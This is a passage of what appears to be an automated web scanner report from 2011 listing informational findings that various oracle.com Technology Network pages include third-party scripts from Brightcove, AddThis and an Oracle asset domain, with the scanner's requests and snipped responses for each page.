20.207. http://www.oracle.com/technetwork/indexes/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/indexes/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=163;ecid=41075364684343375,0:1)
Date: Tue, 06 Sep 2011 16:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.208. http://www.oracle.com/technetwork/indexes/products/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/products/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/indexes/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41110647840983662,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.209. http://www.oracle.com/technetwork/java/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/java/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35928456265613448,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.210. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/middleware/fusion-middleware/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=12;ecid=41141262368570474,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.211. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/middleware/fusion-middleware/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116759579543136,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 173279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.212. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/fusion-middleware/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/middleware/fusion-middleware/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35984685978300754,0:1)
Date: Tue, 06 Sep 2011 16:09:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 184955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.213. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/jrockit/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/middleware/jrockit/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41053722343588042,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 166389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.214. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/soasuite/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/middleware/soasuite/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.215. http://www.oracle.com/technetwork/oem/downloads/index-084446.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/downloads/index-084446.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/oem/downloads/index-084446.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075811361962283,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.216. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/oem/grid-control/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=5;ecid=35984896431701435,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.217. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=40974493081910025,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.218. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/oem/grid-control/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35939369777676995,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140888

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.219. http://www.oracle.com/technetwork/oramag/magazine/home/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oramag/magazine/home/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075635268300620,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.220. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/server-storage/solaris/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/server-storage/solaris/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=201;ecid=41086548779348015,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.221. http://www.oracle.com/technetwork/systems/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/systems/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/systems/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41054851921233213,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.222. http://www.oracle.com/technetwork/topics/cloud/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/cloud/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41157789402743118,0:1)
Date: Tue, 06 Sep 2011 16:09:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.223. http://www.oracle.com/technetwork/topics/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35729659410112168,0:1)
Date: Tue, 06 Sep 2011 16:08:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.224. http://www.oracle.com/technetwork/topics/newtojava/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/newtojava/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/newtojava/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070021745959460,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110971

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.225. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/newtojava/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/newtojava/overview/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/topics/newtojava/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116059499862577,0:1)
Content-Length: 135188
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.226. http://www.oracle.com/technetwork/topics/security/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/topics/security/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/topics/security/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35637678389099849,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

